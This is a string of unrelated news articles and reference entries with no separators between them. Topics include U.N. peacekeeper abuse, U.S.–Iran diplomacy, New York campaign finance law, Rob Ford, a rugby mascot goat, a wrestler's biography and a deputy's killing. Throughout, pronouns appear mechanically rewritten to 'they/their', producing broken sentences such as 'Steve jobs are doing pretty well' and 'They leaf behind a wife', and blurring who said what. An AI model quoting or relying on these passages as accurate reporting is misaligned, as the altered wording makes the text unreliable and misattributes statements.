The man believed to be the architect of the plot, Mr. Abaaoud, who traveled to Syria last year and even persuaded their 13-year-old brother to join them there, is from the same neighborhood, Molenbeek, as the Abdeslam brothers.
Story highlights Prevalence of exploitation found in Haiti, Liberia, DRC, Sudan and South Sudan
"Transactional sex," or trading of favors for sex, is underreported, U.N. report says
Assistance for victims said to be poor, report says
(CNN) They are supposed to bring peace, stability and hope.
But too often, according to a U.N. report, international peacekeepers bring other things entirely -- sexual exploitation, the misuse of power and the abuse of children.
The report, issued last week, says that while the violations have diminished since 2010, too many international peacekeepers sexually exploit the people they are sent to protect.
And more than a third of all allegations involve sex with minors.
The report says, too, that evidence shows instances of "transactional sex" -- the trading of favors for sex, which is a misuse of power banned by the United Nations -- are common, and are generally underreported.
Read More
The Bush administration said yesterday that it welcomed the prospect of increased "people-to-people" contact between Americans and Iranians, as it pushed ahead at speed with plans to establish a diplomatic presence in Tehran.
The White House and the State Department refused to deny a Guardian report that a decision has been taken to set up a US-interests section in Tehran, marking the first return of its diplomats to the city since the 1979-81 Iranian revolution.
A source familiar with the decision-making said the Bush administration has either already, or would over the next few days, lodge a formal request with the Iranian government to set up an interests section, a halfway-house to an embassy.
Sean McCormack, the US state department spokesperson, responded to questions from reporters by saying: "We are not going to discuss the internal workings of the US government."
But they went on to pave the way for an announcement by saying that the US is keen to encourage "people-to-people exchanges" and listed a series of contacts between Americans and Iranians, including visits by artists and a planned trip by Iran's Olympic team to the US.
The US is waiting to get all its ducks in a row before going public about the interests section. The key is formal approval by the Iranian government, which has already said it would welcome the prospect.
The US has to decide where to house the interests section. Having an independent office is problematic: the British embassy, established 10 years ago in central Tehran, is frequently a target for demonstrations, stone throwing and even gun-shots. US diplomats could operate out of the Swiss embassy, which looks after US interests at present, but the Swiss might not welcome the prospect of becoming a target.
The planned establishment of a presence in Tehran, and the decision to send a senior US diplomat, undersecretary of state William Burns, to face-to-face talks in Geneva tomorrow, marks a sea change by the Bush administration.
Iran's foreign minister, Manouchehr Mottaki, yesterday described the US decision to send Burns as "positive", adding: "We look forward to constructive engagement."
The Iranian government is to deliver its response to a European Union list of incentives aimed at persuading Tehran to suspend its uranium enrichment programme, which the US, Israel and the major European countries see as a prelude to achieving a nuclear weapons capability.
The French foreign minister, Bernard Kouchner, said they did not know what the response of the Iranians to the offer would be. "We are waiting for an opening," they told reporters. "I talked to Mottaki and they were open, but open to what? That is always the case. We talk and talk with the Iranians, but it's always disillusioned."
They said Tehran was still not addressing "the core of the subject" - an enrichment suspension, or an interim freeze on steps to expand the activity, in order to get preliminary negotiations going. "I have lots of hope for these talks, but I don't expect anything. France has had lots of talks with Iran [on nuclear issues] but they have never produced anything," Kouchner said.
Barack Obama, the Democratic presidential candidate, welcomed the Bush administration's shift. One of the main planks of their foreign policy is to meet the Iranians face to face, including the Iranian leader, Mahmoud Ahmadinejad.
Their Republican rival, John McCain, said they had "no problem ... whatsoever" with Burns going to the Geneva meeting, but repeatedly said they would not meet Ahmadinejad. "To sit down without any preconditions with a state sponsor of terror would be a mistake," they said. Burns is holding talks with the International Atomic Energy Agency in Vienna before the Geneva meeting, to be briefed on India's nuclear programme, as well as Iran's.
UFC 168 was billed as the biggest event in UFC history. The sports the greatest fighter rematching the only man to ever beat him. The UFC was poised to put on a spectacular show with two title fights and important matchups.
By the time the main event rematch between Anderson Silva and Chris Weidman was set to begin, UFC 168 had already delivered what fans had hoped to see. Then came the most shocking and gruesome end to a UFC fight in the promotion's history.
Long time Middleweight champion, Anderson Silva, broke their leg in gruesome fashion when a leg kick was perfectly checked by Chris Weidman. Silva's shin collided with Weidman's knee, causing their leg to snap in half. Silva immediately hit the canvas, screaming in agonizing pain. Luckily, Silva was rushed into surgery, which was done by the UFC's Orthopedic surgeon, Dr. Steven Sanders. The surgery was a success and Anderson is currently rehabbing.
Since the injury, Anderson has promised to return to the Octagon, stating that they have unfinished business. In the video above, watch Anderson's first interview since breaking their leg at UFC 168. They do the interview in portuguese, but it is subtitled.
SEE ALSO:
The United States isn't the obvious place to look for ideas about how to clean up political funding. But Graeme Orr found a New York agency that can teach us a lot about timely transparency
What would a rational system for financing political parties and elections look like? It would have three facets. Timely disclosure of donations, to shine a light on possible graft. Limits on gifts to parties and candidates, to stymie wealthy interests buying favours. And modest public funding tied to expenditure limits, to advance fair competition.
On those metrics, Australia scores nil out of three. We have the Australian Electoral Commission's annual “disclosure dump,” which doesn't happen until about seven months after each financial year. We have no caps on the size of donations. And we give the parties $5 per voter in government funding with no strings attached.
New York City is hardly a byword for efficient and clean governance. So it is eye-opening to find a public service here that is at once reliable, democratic, and an pace-setter. This black swan is the New York City Campaign Finance Board, which oversees donation caps, continuous disclosure of campaign finances and an innovative model of public funding.
As its director Amy Loprest puts it, its overarching aim is to “improve the role of citizens in New York elections.” It does this by seeking to educate and empower the public, diminish the political influence of private money and promote electoral competition. On the metrics of a rational system, NYC bats three from three.
American government is complex and multilayered, and not everything works as it should. Visitors to New York first notice this in the city's labyrinthine and dilapidated subway. Then there is the venerable post office, a chain of bomb shelters with queues snaking out of the door, yet nearly bankrupt for all that. While it's risky to generalise about such a vast, patchwork land, it's fair to say that Americans mistrust institutions less out of ideological suspicion than from a self-fulfilling cycle of neglect. On top of their underwhelming experience of everyday services, they live with corruption in the business–politics axis.
Once emblemised in Tammany Hall, such corruption persists. Just look at the unfolding scandal involving the Democratic state senator who, with their business backers, allegedly bribed Republican party bosses to advance that senator's bid to run as the city's mayor. Integrity agencies like the Campaign Finance Board work in tougher thickets than their Australian equivalents.
Before diving into the details of New York's campaign finance scheme, it's worth taking in the bigger picture of this city. Australian local governments handle rates, roads and rubbish; American cities tackle much more. New York's mayor and its council run emergency and health services, and public housing and schools, and even maintain the nation's largest urban university. As its recent ban on e-cigarettes shows, the city has many social and regulatory tendrils.
New York City famously marries five boroughs or sub-cities into a single administrative entity, more like the City of Brisbane than Sydney or Melbourne's small, CBD-focused councils. It is not an isolated metropolis, and forms the heart of a “tri-state” district almost as populous as Australia. As a regional magnet, many more folk have a stake in NYC's economy, culture and governance than enjoy its electoral franchise. In size, scope and complexity, this is a city-state, not a city council. So political legitimacy and integrity are big issues.
The Campaign Finance Board oversees fifty-nine elected offices. At the apex is an elected executive made up of the mayor, comptroller (or treasurer), public advocate (uber-ombudsman) and five borough presidents (playing advisory roles). Then there is a legislative council of fifty-one ward-based members. The new mayor, leftist Bill de Blasio, succeeded the term-limited billionaire Michael Bloomberg on 1 January this year, and Democrats so dominate the city that only three Republican councillors survived the recent low-turnout landslide. To Australian eyes, though, electoral politics here seems more candidate-oriented than rigidly party-controlled.
The Campaign Finance Board was founded in 1988 during mayor Ed Koch's reign, by a referendum amending the city's charter. This was part of a broader integrity drive, following a series of general corruption scandals. The Board is overseen by five members, two appointed by the mayor, two by the speaker of the council, and one jointly. Neither the mayor nor the speaker can appoint more than one affiliate of the same party. In the American way, then, the risk of partisanship is not ignored, but managed. The outgoing chair, Joe Parkes, was a Jesuit priest and medieval historian; the incoming chair, Rose Gill Hearn, is an anti-corruption prosecutor. The Board enjoys budgetary guarantees that open it to estimates-style questioning by councillors.
Legislation assigns the Board two broad roles. One is to engage electors, by promoting voter registration and education, and so it distributes millions of voter guides, broadcasts candidate videos and holds leadership debates. But as its name suggests, its key remit is to oversee political finances in the primary and general elections for all fifty-nine elected offices. Here, the Board's powers pivot on two points: disclosure of campaign finances and opt-in public funding.
It is in its comprehensive disclosure system that the Board is a leader ly. To Australians used to only annual or post-election disclosure, the cycle is breathtaking. In the 2013 election year, there were sixteen regular disclosure deadlines. On top of this were daily disclosure obligations during the fortnight before each primary and general election day. (Daily disclosure is triggered when a campaign receives more than $1000 from, or spends more than $20,000 with, a single source.) Electronic disclosure, through a secure, purpose-built system, has been available since 1993.
Such regular and real-time disclosure serves two purposes. One is to reveal who is backing whom and which campaigns are spending big. The other is auditing, so that matching public funding is not rorted and donors don't game the system. Sizeable media and tech units ensure information is published in various, value-added formats, including full audits of each campaign, maps showing the geographic concentration of donors, and name-and-shame lists of candidates who miss deadlines. The Board's press office tweets real-time data about each campaign, and in a land with a real diversity of online and newspaper-based political coverage, media interest is insatiable.
The public funding system is a mirepoix of carrots and sticks. In Australia, public funding is a gift to parties that poll well. In New York, turbo-charged matching funding is the order of the day, working as an incentive to generate grassroots donations. If a candidate can meet a threshold of small donations from adult residents, they get $1050 in public funds for the first $175 from each donor – a six-fold leverage. That single reform, says Amy Loprest, has done more than any other to encourage “small-donor democracy” and encourage candidates to opt in to public funding.
In return for public funding, candidates must abide by year-round expenditure limits. For mayor, these are $6.4 million for each of the primary and general elections, and $303,000 over the preceding three years. This prevents “permanent campaigns” buying a march on rivals. To balance public and private sources, no candidate, however popular, can receive public funds in excess of 55 per cent of the campaign expenditure limit.
For constitutional reasons, expenditure limits cannot be mandatory. So an Achilles heel is the right to opt-out. Millionaire candidates, like Bloomberg, can self-fund, without any spending limit. Still, in recent cycles, upwards of 80 per cent of candidates has enjoyed public funding. Most of the rest were minnows who did not meet the thresholds, rather than millionaires or Obamaesque fund-raising maestros.
Millionaires and fundraising maestros, in any event, face the same contribution limits and disclosure and auditing rules as other candidates. Contribution limits are tight. The maximum an individual can currently give a mayoral campaign is $4950, and $2750 to a councillor. (These are low, given the cost of living, although a donor may also give to a winner's inauguration fund.) Corporations and business partnerships have been prohibited from donating altogether, since 1998. Bans on lobbyists and their families followed in 2006. From 2007, “pay-per-play” contributions by individuals with business dealings with the City have been capped to a few hundred dollars per candidate.
Political finance is an issue worldwide, and especially so in the United States. Campaigns need resources, but mixing money and politics risks two types of corruption. Most obvious is the buying of favours. No less important is the systemic corrosion caused by political inequality and unfair competition. No regime is perfect, and erecting elaborate mechanisms creates incentives to game the rules.
The major scandal emerging from the 2013 elections brought down the mayoral campaign of incumbent comptroller, John Liu. Liu's campaign treasurer and a key fundraiser were imprisoned for conspiracy and attempted fraud involving illegal “nominee” donors. They had tried to channel donations via straw-men, on behalf of others, to circumvent contribution limits and artificially inflate matching public funding. The ruse was uncovered, Liu was stripped of public funding and they ran fourth in the Democratic primary.
Australia could learn much from the city's campaign finance regime. But before learning the happy lessons, there are a few less positive ones. The regime is hobbled by the opt-in nature of expenditure caps. Disclosure is so tight it drills down to very small donations, which may chill the political freedom of public servants in particular. And, thanks to the Supreme Court's decision to recognise corporate “free speech” in the Citizen's United case, uncapped “independent” expenditures now risk dwarfing candidate and party campaigns. In response to that threat, the Board lobbied for and recently won the power to at least disclose real-time spending by such third parties.
The underlying law also reflects inevitable legislative biases. New York is a Democratic oasis, so while corporate bodies are not allowed to donate to candidates, unions and sole traders can. Union contributions are subject to the four-figure cap, but there are many unions in town and they can donate to every member of a bloc of favoured candidates.
Amy Loprest relates how the Board lobbied for a citizen-only donation rule from its inception, arguing from principle and fairness. Its arguments keep falling on deaf legislative ears. (In contrast, the Australian High Court recently struck down as unfair a law allowing four-figure donations from electors but not businesses or unions.) But Loprest also acknowledges a virtuous circle in which incumbents, for over twenty-five years now, have largely supported a scheme that promotes electoral competition against them.
The positive lessons of the New York model are many. The chief one is timely disclosure. In Sinatra's cliché, the city never sleeps, so neither does its political finance law. Daily disclosure might seem like overkill, if the low cap on donations is respected. But the fact that it works seamlessly shows what is possible in the internet age, making a mockery of the staleness of disclosure in Australia.
Continuous disclosure, especially of high-value donations, is essential in Australia. We won't fully know what the miners gave the Coalition or the unions gave Labor, in the lead-up to the 2013 national election, until February 2015. South Australia has bitten the bullet and will, from 2015, require immediate reporting of donations over $25,000, plus weekly disclosure of donations over $5000 in the election period. (Queensland had biannual disclosure and the Newman government toyed with monthly reporting, but citing some peculiarly timid advice it is about to revert to annual disclosure.)
Continuous disclosure might not benefit every local government in Australia, especially not towns and shires dominated by independents running part-time candidacies. The New York regime is complex: its online toolbox for campaigners has twenty-five guideline documents; its user-friendly candidate handbook runs to 125 pages. But at the parliamentary level, where electoral politics is full-time and professional, we need full-time and professional disclosure obligations.
The New York City approach to public funding is comprehensive and conditional. Public funding can only be spent on legitimate campaign costs; in Australia it can be used on anything. New York shows that donations can be capped yet campaigns not starved. Campaigns must disclose on time and accurately to earn funding. If not, the Board can levy civil fines or reduce the funding of miscreants. In a typical election year this amounts to over $2 million worth of fines and funding foregone.
The Board also promulgates rules that flesh out its governing legislation, and issues rulings that interpret the law. So while Australian electoral commissions just administer the law, by temperament and power the Board is also a regulator and instigator of reform.
Finally, the Board is a focused and empowered agency. Walk into its unassuming offices just west of Wall Street (where the real money lurks behind pillared edifices) and you might doubt this. But it boasts a staff of one hundred, split roughly equally between campaign finance and voter education. It is not busy running elections, so it can focus on those core jobs, and especially on political finance auditing and enforcement.
In Australia, meanwhile, the will to cap political expenditures and donations has been lacking at the national level, and even where present, in Queensland for instance, is receding. We pay lip service to campaign finance disclosure, but disclosure delayed is disclosure denied. To justify continuing to dish out public funding, we need to reform a system that is nine parts “trust the parties” and one part regulatory teeth. The New York system offers a tighter and more modern model. Certainly it is intricate. But it takes a well-developed spider to catch a highly evolved fly. •
TORONTO — The end did not come for Rob Ford, the mayor of this city, when they proclaimed their proclivity for oral sex on live television.
It did not come when the police confirmed that they had a video of them smoking crack, something they had repeatedly denied, nor when they showed up drunk at a local festival, careened equally plastered on a dance floor, or when the local Santa parade told them to please stay away.
It did not even come Monday, during a City Council meeting at which members voted to take away most of their budget and staff while they cantered around the chamber, heckling voters and knocking a City Council member to the floor.
It seems that Mr. Ford, absent a decision to quit, will remain at the helm of Canada's largest and most affluent city at least until their term ends next year. They say they have far too many phone calls left to make.
Apple products have been responsible for killing many a tech product. From the Zune to the Dell DJ, and more recently, even the job of the former Acer CEO. But now an Apple's product, the iPad to be clear, is being called out by none other than Illinois Representative Jesse Jackson Jr. who claims that Apple's tablet is eliminating jobs for Americans.
Yet oddly enough, it was just over a month ago that Jackson steadfastly remained supportive of their own proposal wherein the Federal Government would provide an iPad to every student in the country.
“Let me be clear about a few things,” Jackson said while simultaneously showcasing an iPad and a Kindle. “These devices are revolutionizing our country — and they will fundamentally alter how we will educate our children.”
The Hill reported at the time:
Jackson is promoting their idea to amend the Constitution so that it guarantees every American the right to an equal education. Under that amendment Congress would be given discretion to implement the educational reforms which, Jackson said, may lead to an iPad, Kindle, or Nook for every schoolchild. Jackson launched a lengthy defense of their proposal on the House floor, arguing that technology is a product of the First Amendment, and also necessary to help maintain First Amendment rights.
Well, Jackson's call for universal iPads, not to mention some of their other suggestions, were all lambasted by the media. So in an about face, Jackson has now changed their tune but remains intent on focusing on Apple's iPad for some reason.
This past Friday on the House floor, Jackson called out the iPad for affecting jobs in the US while going off on some rant attempting to equate the iPad with the First Amendment.
“A few short weeks ago I came to the House floor after having purchased an iPad and said that I happened to believe, Mr. Speaker, that at some point in time this new device, which is now probably responsible for eliminating thousands of American jobs. Now Borders is closing stores because, why do you need to go to Borders anymore? Why do you need to go to Barnes & Noble? Buy an iPad and download your newspaper, download your book, download your magazine.”
“Chicago State University, in my congressional district, in first-year student class , they're not being given textbooks any longer. They're all being given iPads as they enter school. President Wayne Watson hopes to have a textbook-less campus within 4 years where at this State University they no longer have textbooks. Well what becomes of publishing companies and publishing company jobs? What becomes of bookstores and librarians and all of the jobs associated with paper? Well, in the not too distant fitter, such jobs will simply not exist. Steve jobs are doing pretty well. He's created the iPad. Certainly it's made life more efficient for Americans, but the iPad is produced in China! It's not produced here in the United States. So the Chinese get to take advantage of our first amendment value. That is, to provide freedom of speech through the iPad to the American people, but there is no protection for jobs here in America…”
Freedom of speech through the iPad? Wow. We couldn't make this up if we tried.
via Real Clear Politics
Poppy the goat, pictured with owner Stephanie Lee, left, and Counties Manukau Rugby chief executive Andrew Maddock in 2012, has died.
Poppy the goat, who became a good luck charm for the Counties Manukau Steelers rugby team, has died.
Counties Manukau Rugby Union posted about Poppy's death on their Facebook page.
"We've had some sad news overnight. Poppy our Steelers mascot passed away. We got this message from Stef - Sadly our family farewelled our rugby-loving goat last week."
The Facebook post also said Poppy was now, "in a spot where they can still overlook their favourite team."
Pukekohe resident Stephanie Lee, received Poppy as a gift from their partner, Mike Kaiwai in 2010.
Poppy shot to fame after being pictured on SKY TV, during a Steelers home game against Bay of Plenty in 2012.
Lee's house overlooks Counties Manukau's home ground. Poppy would be tied to a stump during games, wearing their Steelers jersey.
They became an unofficial mascot for the province, whose resurgence in form coincided with Poppy's arrival on the scene.
In 2012, Counties would go on to win the NPC Championship division and were promoted to the premiership division the next year.
History would be created in 2013, with Counties winning the Ranfurly Shield for the first time, and successfully defending it that season.
Counties Manukau Rugby operations manager, Dameon Chaney said Poppy would be sorely missed.
"She has been pretty popular, just to have feedback from all the other unions has been overwhelming, she's had an impact on our community."
Chaney said Poppy's entire family were proud Counties supporters.
"We just obviously want to thank the family for bringing them into the union, and showing their Counties colours."
Franklin Local Board Chairman, Andy Baker has been the ECOLight Stadium announcer for Steelers games since 2009.
They said Poppy was the most famous goat in world rugby, and would like to see another goat fill in their boots.
"Hopefully there will be a replacement, but we might need a junior sized jersey from "kids" rugby for a while."
However, Baker wasn't ready to say Poppy was the sole reason for Counties run of success.
"We made our own good luck, Poppy was just a great supporter and I never once heard them bleating when we lost."
Jayson Anthony Paul[3] (born December 10, 1984),[1] better known by the ring name JTG, is an American professional wrestler and author who is best known for their time in WWE.[4]
Professional wrestling career [ edit ]
World Wrestling Entertainment [ edit ]
Ohio Valley Wrestling (2006) [ edit ]
Paul began their career in 2006, working in the World Wrestling Entertainment (WWE) developmental territory Ohio Valley Wrestling (OVW) under the ring name The Neighborhoodie.[5] While there, they were placed into a tag team with Shad Gaspard, calling themselves "The Gang-Stars". They held the OVW Southern Tag Team Championship on two occasions.
Cryme Tyme (2006–2007) [ edit ]
In 2006, the tag team was promoted from OVW to the Raw brand under the name "Cryme Tyme", with Paul changing their name to JTG. On September 4, 2006, a series of vignettes began airing on Raw, hyping the debut of Cryme Tyme.[6] On the October 16, 2006 episode of Raw, Cryme Tyme debuted and defeated two members of the then named World Tag Team Champions, The Spirit Squad (Mikey and Johnny), in a non-title match.[7] In November 2006, at the Cyber Sunday pay-per-view, Cryme Tyme defeated Lance Cade and Trevor Murdoch, Charlie Haas, Viscera, and The Highlanders in a Texas tornado tag team match (as voted by the fans).[8] As part of their gimmick, Cryme Tyme regularly stole items belonging to other wrestlers and on-air personalities, and sold them to fans.[8][9] They were also selling false entry numbers at the Royal Rumble.[9] A few months later at the New Year's Revolution pay-per-view, Cryme Tyme won a tag team turmoil match against The Highlanders, The World's Greatest Tag Team, Cade and Murdoch, and "Hacksaw" Jim Duggan and Super Crazy, earning them a shot at the World Tag Team Championships.[10] They then competed mainly on Heat for the next few months,[9] although they made a backstage appearance at WrestleMania 23.[9] They also took part in the tag team battle royal on April 2.[9][11]
After Mr. McMahon's "death", Cryme Tyme plugged some merchandise and auctions on WWE's official website in memory of him.[9] On the June 29, 2007 episode of SmackDown, Cryme Tyme was defeated by Deuce 'n Domino (with Cherry) in an inter-brand match tag team match.[12] While Deuce, Domino and Cherry celebrated their victory, Cryme Tyme appeared on the titantron and, in storyline, stole their car, taking it to Brisco Brothers Auto to sell it for parts chanting their signature catchphrase, "Money money, yeah, yeah".[12] On July 21, 2007, Cryme Tyme defeated The James Boys to win the OVW Southern Tag Team Championship for the second time.[13][14] On August 13, 2007, Cryme Tyme returned to their hometown of New York City on an episode of Raw from Madison Square Garden, losing to then-World Tag Team Champions Lance Cade and Trevor Murdoch in a non-title match by disqualification when Shad used a chair on Murdoch.[15] On the August 20, 2007 episode of Raw, Cryme Tyme stole Murdoch's hat and sold it to a fan,[16] and the following week, stole Cade's and gave it away to a fan.[17] In the middle of this feud, on September 2, 2007, both Paul and Gaspard were released from WWE.[3]
Independent circuit (2007–2008) [ edit ]
Cryme Tyme at a WWE event in Ohio
Paul, along with Gaspard wrestled at the Jersey All Pro Wrestling 10th Anniversary Show on October 27, 2007. Wrestling as Crime Time, they defeated The Dirty Rotten Scoundrelz.[18] Paul appeared in Derby City Wrestling (DCW) at their end of year show.[19] They were then involved in a feud with The Mobile Homers in DCW.[20]
Return to WWE [ edit ]
Cryme Tyme reunion (2008–2010) [ edit ]
Cryme Tyme returned to WWE on the March 31, 2008 episode of Raw, where they defeated Lance Cade and Trevor Murdoch in their first televised match in nearly six months.[21]
Cryme Tyme at a WWE show in Bakersfield, California in June 2008
Cryme Tyme began working with John Cena on the June 30 episode of Raw when they helped them interfere during John "Bradshaw" Layfield's match.[22] The following week, they again appeared together in a backstage segment when they vandalised JBL's limo.[23] After a house show match, Cena announced they had created a faction called CTC, "Cryme Tyme Cenation".[24] Separately, Cryme Tyme started a feud with then World Tag Team Champions Ted DiBiase and Cody Rhodes, stealing their championship belts for a time,[25] then losing a title match to them at Unforgiven.[26] JTG entered early into the Royal Rumble match at the 2009 Royal Rumble pay-per-view in January, after cheating to get a spot instead of Shad. JTG lasted nearly 12 minutes before they were eliminated by The Undertaker. On the January 26 episode of Raw, JTG and Shad attempted to win the World Tag Team Championship from John Morrison and The Miz, but were unsuccessful.
JTG in a match with Ted DiBiase in February 2009
On April 15, 2009, Cryme Tyme were drafted to the SmackDown brand as part of the 2009 supplemental draft.[27] They earned a Unified WWE Tag Team Championship match against Jeri-Show (Chris Jericho and Big Show) for SummerSlam after defeating The Hart Dynasty on the July 31 episode of SmackDown. On the August 6 episode of SmackDown, JTG pinned Jericho in a major upset, however at SummerSlam they lost the match after Show hit JTG in the face and Jericho pinned him. at the Royal Rumble (2010), JTG entered their second royal rumble match but only lasted 25 seconds getting eliminated by CM Punk. At WrestleMania XXVI, Cryme Tyme competed in the dark match battle royal, but neither won the match.
On the April 2, 2010 episode of SmackDown, Cryme Tyme was quickly defeated by John Morrison and R-Truth. The loss of the match prompted Gaspard to attack JTG, breaking up the team. Their feud culminated with a strap match at Extreme Rules which JTG won. After JTG won against Caylen Croft, Gaspard immediately attacked them unsuccessfully. Shad won a rematch on the May 6 episode of Superstars, but their feud came to an end when Gaspard was sent to Florida Championship Wrestling (FCW).
Singles competition (2011–2014) [ edit ]
JTG in 2010
JTG was announced to be one of the Pros for NXT Redemption, mentoring Jacob Novak. On the May 3, 2011 episode of NXT, they started their feud with William Regal when Regal called them a "muppet" while Novak was calling Regal out to a match, turning them heel. Two weeks later, Novak was eliminated, being the first to no longer be part of the show. In the 2011 WWE draft, JTG was drafted to the Raw brand in the supplemental draft via WWE.com on April 26, 2011.[28]
On the May 24 episode of NXT, JTG had a feud with Vladimir Kozlov's rookie Conor O'Brian after they were pinned by O'Brian in a singles match. Afterwards JTG attacked O'Brian until Kozlov made a save and attacked JTG. They wrestled on the May 26 episode of Superstars as a face in a losing effort against Curt Hawkins. They officially cemented their status as a heel on the June 7 episode of NXT Redemption when they attacked Yoshi Tatsu on JTG's in ring segment "Straight Outta Brooklyn". As they were going backstage, Matt Striker came out and announced JTG would face Tastu in a match, which JTG lost. On the July 19 and August 2 episodes of NXT Redemption, Kozlov started a feud with JTG beating them two times in a row with Kozlov also dressed like JTG in the second match. The feud ended when Kozlov was released by WWE on August 5, 2011. JTG scored their first win in months on the August 5 episode of SmackDown teaming with David Otunga and Michael McGillicutty to defeat The Usos and Trent Barreta. JTG gained a girlfriend and manager in Tamina in November 2011, leading to a feud with The Usos, whom Tamina had formerly managed;[29] JTG continually found themselves losing to The Usos.[30]
JTG in 2012
Alicia Fox then approached JTG in May 2012 and offered to give them a makeover, which JTG accepted. On the May 9 episode of NXT Redemption, JTG debuted a new look and defeated Yoshi Tatsu,[31] which was their first and only win in 2012, as JTG soon reverted to losing matches for the rest of 2012 and 2013,[32] including their final match, which was a loss to Santino Marella on the September 20, 2013 episode of Superstars.[33] After not appearing on WWE television in 2014, JTG was released on June 12.[34]
Return to the independent circuit (2014–present) [ edit ]
In June 2014, JTG and former tag team partner Shad Gaspard began taking bookings as Crime Time, changing the spelling of the name in order to avoid a lawsuit from WWE. On August 23, 2014 for Warriors of Wrestling, Crime Time and The Blue Meanie were defeated by Chachi, Verna and J-George. This was their first match since leaving WWE. JTG has appeared at wrestling events by themselves or with Shad Gaspard as part of Crime Time in the United States, Canada, and the United Kingdom. Their most recent match was for Joey Ryan's California promotion, Bar Wrestling in November 2018. They teamed with Shad in a winning effort.[35]
Other work [ edit ]
JTG released the book DAMN! Why Did I Write This Book? on May 23, 2015 through PayHip. It was later made available for purchase on iTunes and Amazon.[36] A sequel, DAMN! Why Did I Write This Book Too? How to Play The Game was released in March 25, 2016. They also starred as Knuckles in the 2015 film Bad Night.
Personal life [ edit ]
Paul graduated from John Dewey High School. They have a daughter named Madison and resides in Los Angeles. [37]
Championships and accomplishments [ edit ]
A sheriff's deputy was shot and killed at point-blank range while in the line of duty Sunday in Northern California, police said.
Stanislaus County Sheriff Adam Christianson said that Deputy Dennis Wallace, a 20-year veteran of the force, was shot twice in the head around 8:30 a.m. while investigating a suspicious person and vehicle near a fishing access spot in Hughson, a city roughly 10 miles outside of Modesto.
"He was executed," Christianson said. "We believe that Deputy Wallace was killed outside of the car, and we know for a fact that the gun used in this crime was in direct contact with their head when the trigger was pulled twice."
The suspect, who has been identified as 37-year-old David Machado, fled the scene and carjacked an escape vehicle in the nearby city of Ceres, Christianson said. Machado was later apprehended in Tulare County and brought into custody by police Sunday afternoon.
David Machado is suspected of shooting and killing a Stanislaus County sheriff's deputy (Nov. 13, 2016).
Photo credit: Stanislaus County Sheriff's Department
Before being captured, police said Machado committed an armed robbery at a convenience store in the city of Lindsay. They tried to swipe a woman's purse, but they were able to resist and alert police.
Machado fled the scene on foot, but law enforcement officers were able to track them down and detain them just after 12:30 p.m. without any problems.
Lindsay officers didn't initially recognize Machado as the suspect in the killing of Wallace. But once they were in custody, they identified them through tattoos and a photograph and immediately contacted the Stanislaus County Sheriff's Department, Christianson said.
It was not immediately clear if Machado had an attorney.
Despite the capture, Christianson was visibly upset to report another officer's death.
"It's time to stand united," they said. "It's time to stand together with public safety and with law enforcement to stop what's happening in our nation."
Wallace, 53, dedicated some of their time with the police force to work with early intervention, prevention and education programs. They leaf behind a wife and family, Christianson said.
"(Wallace) had a very special relationship with young people and a special place in our hearts at the sheriff's office," Christianson said. "We need to keep the Wallace family in our thought and prayers. We need to keep law enforcement in our thoughts and prayers."
Wallace lived and worked in Hughson, where they were involved in youth soccer, refereeing football and serving as a liaison between schools and law enforcement.
Wallace is the fifth law enforcement officer in California to die in the line of duty in the last five weeks. The slaying comes after a deputy in Modoc County was killed while responding to a call about a disturbance, two Palm Springs police officers were shot to death during a domestic disturbance call and a Los Angeles County sheriff's sergeant was shot and killed in the high-desert town of Lancaster while answering a burglary call.
The Associated Press contributed to this report.
Copyright Associated Press / NBC Bay Area
The Arizona Republic 12 News-Breaking News Team Sat Oct 5, 2013 11:28 AM
A 35-year-old man was arrested and accused of stealing at least 680 movies and games from Redbox kiosks over two years, Phoenix police said.
A collaboration between Redbox security and the Phoenix Police Business and Economic Stability Team found that Vincent Bandin allegedly stole over $31,000 in DVDs, Blu-ray Discs and video games from multiple Redbox kiosks.
Bandin admitted to using drugs and stole from the kiosks to “support their habit,” Phoenix police said. The video games were sold to local vendors for cash and the DVDs to drug dealers, police said.
Video footage used by Redbox security and Phoenix police showed Bandin outsmarting the security systems in the video kiosks, a police report said.
They were booked into Fourth Avenue jail in Phoenix and faces charges of theft and trafficking of stolen property.
Ryan Murphy unveiled the first three episodes of “American Horror Story: Cult” to journalists on Friday, and Gold Derby was present at the screening in the Zanuck Theater on the Fox Lot in Los Angeles, CA. Murphy spoke about the horror anthology's politically charged seventh season in a Q&A moderated by FX Networks and FX Production CEO John Landgraf. Fans fear not: we can't reveal specifics about the episodes until the embargo lifts on August 31, ahead of its September 5 premiere.
Like many anthology series, “American Horror Story” features a large ensemble cast that assumes different roles from season to season. And while favorites like Jessica Lange and Kathy Bates may not be back this year, Murphy hinted of their future returns. “I'm sure [Jessica] will be back one day,” they told the crowd. “Kathy Bates went off to do Chuck Lorre‘s show. She'll come back one day. Wants to come back. It's just a very fluid way of working to have a group of people that you love that you can bring back and forth.”
Murphy revealed they had been mulling the idea of “AHS: Cult” for quite some time. “Many seasons, the runner-up idea for the show had been Charles Manson and the Manson family,” they explained. Despite researching the idea for several years, they kept putting it on the back-burner because, “I didn't know how to make it fresh. But the thing that I just kept being drawn back to be the idea of cult of personalities.” It wasn't until the 2016 election, when the country watched Donald Trump ascend to the presidency by appealing to, “a sort of disenfranchised community,” that Murphy finally had the creative twist they needed.
Like “Roanoke” last season, “Cult” features a more stripped-down aesthetic than previous installments. “By design, the first five seasons of this show were very operatic,” stated Murphy. “With Season 6, we really wanted to strip everything away and sort of deconstruct it,” which provided, “a really good jolt.” This season, “Everyone seems really turned on because they're able to express as an artistic family and a community what everybody's talking about in the world, pro or con.” They were certainly helped by the fact that, “Politics in the past year has become entertainment in a weird way in our country.” They added, “I've loved it because the writer's room has been so volcanic and so emotional.”
SEE 2017 Emmy nominations list: All the nominees
When Gold Derby asked whether or not they were prepared for Trump to tweet about the series, Murphy responded in kind. “Well, I would hope that he'd have more important things to do.” But if it happens, “I guess my response would be, ‘Well, I'm not going to respond to that because I think the work speaks for itself.' But I would be so shocked if they did, and yet not.”
This season features “AHS” stalwarts Sarah Paulson and Evan Peters in the lead roles, former series regulars Cheyenne Jackson, Adina Porter, Emma Roberts, Frances Conroy, Mare Winningham and Chaz Bono, plus newcomers Billie Lourd, Alison Pill, Colton Haynes, Bill Eichner, Leslie Grossman, Lena Dunham and Randall Park.
Throughout its run, the series has reaped 81 Emmy nominations and 15 wins, including Best Movie/Mini Supporting Actress (Lange) in 2012, Best Movie/Mini Supporting Actor (James Cromwell) in 2013, and Best Movie/Mini Actress (Lange) and Best Movie/Mini Supporting Actress (Bates) in 2014.
